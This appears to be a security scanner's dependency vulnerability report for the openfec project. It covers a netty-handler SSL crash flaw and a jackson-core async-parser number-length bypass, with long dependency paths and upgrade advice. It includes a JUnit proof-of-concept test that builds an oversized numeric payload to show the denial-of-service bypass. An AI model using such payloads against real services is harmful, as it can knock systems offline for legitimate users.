Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.projectreactor.netty:reactor-netty-http@1.0.48 › io.projectreactor.netty:reactor-netty-core@1.0.48 › io.netty:netty-handler@4.1.94.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.projectreactor.netty:reactor-netty-http@1.0.48 › io.netty:netty-codec-http2@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final › io.netty:netty-handler@4.1.94.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.projectreactor.netty:reactor-netty-http@1.0.48 › io.projectreactor.netty:reactor-netty-core@1.0.48 › io.netty:netty-resolver-dns@4.1.112.Final › io.netty:netty-handler@4.1.94.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.projectreactor.netty:reactor-netty-http@1.0.48 › io.projectreactor.netty:reactor-netty-core@1.0.48 › io.netty:netty-handler-proxy@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final › io.netty:netty-handler@4.1.94.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.projectreactor.netty:reactor-netty-http@1.0.48 › io.netty:netty-resolver-dns-native-macos@4.1.112.Final › io.netty:netty-resolver-dns-classes-macos@4.1.112.Final › io.netty:netty-resolver-dns@4.1.112.Final › io.netty:netty-handler@4.1.94.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.projectreactor.netty:reactor-netty-http@1.0.48 › io.projectreactor.netty:reactor-netty-core@1.0.48 › io.netty:netty-resolver-dns-native-macos@4.1.112.Final › io.netty:netty-resolver-dns-classes-macos@4.1.112.Final › io.netty:netty-resolver-dns@4.1.112.Final › io.netty:netty-handler@4.1.94.Final

Overview

io.netty:netty-handler is a library that provides an asynchronous event-driven network application framework and tools for rapid development of maintainable high performance and high scalability protocol servers and clients. In other words, Netty is a NIO client server framework which enables quick and easy development of network applications such as protocol servers and clients. It greatly simplifies and streamlines network programming such as TCP and UDP socket server.

Affected versions of this package are vulnerable to Improper Validation of Specified Quantity in Input when validating SSL packets using the native SSLEngine. The SSL_RECORD_HEADER_LENGTH of an incoming packet is not properly checked in the getEncryptedPacketLength() function, allowing attackers to trigger a crash by sending malicious packets.

Workaround

This vulnerability can be avoided by not using the native SSLEngine.

Remediation

Upgrade io.netty:netty-handler to version 4.1.118.Final, 4.2.0.RC3 or higher.

References

Improper Validation of Specified Quantity in Input vulnerability report

high severity

new

Allocation of Resources Without Limits or Throttling

Vulnerable module: tools.jackson.core:jackson-core
Introduced through: tools.jackson.core:jackson-core@3.0.4, org.flywaydb:flyway-commandline@12.0.3 and others

Detailed paths

Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to tools.jackson.core:jackson-core@3.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › tools.jackson.dataformat:jackson-dataformat-xml@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-snowflake@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-reports@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-verb-schemas@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-verb-repair@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › tools.jackson.dataformat:jackson-dataformat-toml@3.0.4 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › tools.jackson.dataformat:jackson-dataformat-xml@3.0.4 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-gradle-plugin@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-gradle-plugin@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-cassandra@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-db2@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-derby@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-hsqldb@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-ignite@10.24.0 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-informix@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-mysql@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-oracle@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-postgresql@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-redshift@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-saphana@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-snowflake@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-sybasease@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-tidb@10.24.0 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-firebird@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-gcp-bigquery@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-gcp-spanner@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-singlestore@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-sqlserver@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-verb-baseline@12.0.3 › org.flywaydb:flyway-verb-schemas@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-verb-migrate@12.0.3 › org.flywaydb:flyway-verb-schemas@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-gradle-plugin@12.0.3 › org.flywaydb:flyway-database-oracle@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-gradle-plugin@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-verb-migrate@12.0.3 › org.flywaydb:flyway-verb-baseline@12.0.3 › org.flywaydb:flyway-verb-schemas@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.

Overview

PoC

The following JUnit 5 test demonstrates the vulnerability. It shows that the async parser accepts a 5,000-digit number, whereas the limit should be 1,000.

package tools.jackson.core.unittest.dos;

import java.nio.charset.StandardCharsets;

import org.junit.jupiter.api.Test;

import tools.jackson.core.*;
import tools.jackson.core.exc.StreamConstraintsException;
import tools.jackson.core.json.JsonFactory;
import tools.jackson.core.json.async.NonBlockingByteArrayJsonParser;

import static org.junit.jupiter.api.Assertions.*;

/**
 * POC: Number Length Constraint Bypass in Non-Blocking (Async) JSON Parsers
 *
 * Authors: sprabhav7, rohan-repos
 * 
 * maxNumberLength default = 1000 characters (digits).
 * A number with more than 1000 digits should be rejected by any parser.
 *
 * BUG: The async parser never calls resetInt()/resetFloat() which is where
 * validateIntegerLength()/validateFPLength() lives. Instead it calls
 * _valueComplete() which skips all number length validation.
 *
 * CWE-770: Allocation of Resources Without Limits or Throttling
 */
class AsyncParserNumberLengthBypassTest {

    private static final int MAX_NUMBER_LENGTH = 1000;
    private static final int TEST_NUMBER_LENGTH = 5000;

    private final JsonFactory factory = new JsonFactory();

    // CONTROL: Sync parser correctly rejects a number exceeding maxNumberLength
    @Test
    void syncParserRejectsLongNumber() throws Exception {
        byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);
        
        // Output to console
        System.out.println("[SYNC] Parsing " + TEST_NUMBER_LENGTH + "-digit number (limit: " + MAX_NUMBER_LENGTH + ")");
        try {
            try (JsonParser p = factory.createParser(ObjectReadContext.empty(), payload)) {
                while (p.nextToken() != null) {
                    if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
                        System.out.println("[SYNC] Accepted number with " + p.getText().length() + " digits — UNEXPECTED");
                    }
                }
            }
            fail("Sync parser must reject a " + TEST_NUMBER_LENGTH + "-digit number");
        } catch (StreamConstraintsException e) {
            System.out.println("[SYNC] Rejected with StreamConstraintsException: " + e.getMessage());
        }
    }

    // VULNERABILITY: Async parser accepts the SAME number that sync rejects
    @Test
    void asyncParserAcceptsLongNumber() throws Exception {
        byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);

        NonBlockingByteArrayJsonParser p =
            (NonBlockingByteArrayJsonParser) factory.createNonBlockingByteArrayParser(ObjectReadContext.empty());
        p.feedInput(payload, 0, payload.length);
        p.endOfInput();

        boolean foundNumber = false;
        try {
            while (p.nextToken() != null) {
                if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
                    foundNumber = true;
                    String numberText = p.getText();
                    assertEquals(TEST_NUMBER_LENGTH, numberText.length(),
                        "Async parser silently accepted all " + TEST_NUMBER_LENGTH + " digits");
                }
            }
            // Output to console
            System.out.println("[ASYNC INT] Accepted number with " + TEST_NUMBER_LENGTH + " digits — BUG CONFIRMED");
            assertTrue(foundNumber, "Parser should have produced a VALUE_NUMBER_INT token");
        } catch (StreamConstraintsException e) {
            fail("Bug is fixed — async parser now correctly rejects long numbers: " + e.getMessage());
        }
        p.close();
    }

    private byte[] buildPayloadWithLongInteger(int numDigits) {
        StringBuilder sb = new StringBuilder(numDigits + 10);
        sb.append("{\"v\":");
        for (int i = 0; i < numDigits; i++) {
            sb.append((char) ('1' + (i % 9)));
        }
        sb.append('}');
        return sb.toString().getBytes(StandardCharsets.UTF_8);
    }
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade tools.jackson.core:jackson-core to version 3.1.0 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

high severity

new

Allocation of Resources Without Limits or Throttling

Vulnerable module: tools.jackson.core:jackson-core
Introduced through: tools.jackson.core:jackson-core@3.0.4, org.flywaydb:flyway-commandline@12.0.3 and others

Detailed paths

Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to tools.jackson.core:jackson-core@3.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › tools.jackson.dataformat:jackson-dataformat-xml@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-snowflake@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-reports@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-verb-schemas@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-verb-repair@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › tools.jackson.dataformat:jackson-dataformat-toml@3.0.4 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › tools.jackson.dataformat:jackson-dataformat-xml@3.0.4 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-gradle-plugin@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-gradle-plugin@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-cassandra@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-db2@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-derby@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-hsqldb@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-ignite@10.24.0 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-informix@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-mysql@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-oracle@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-postgresql@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-redshift@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-saphana@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-snowflake@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-sybasease@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

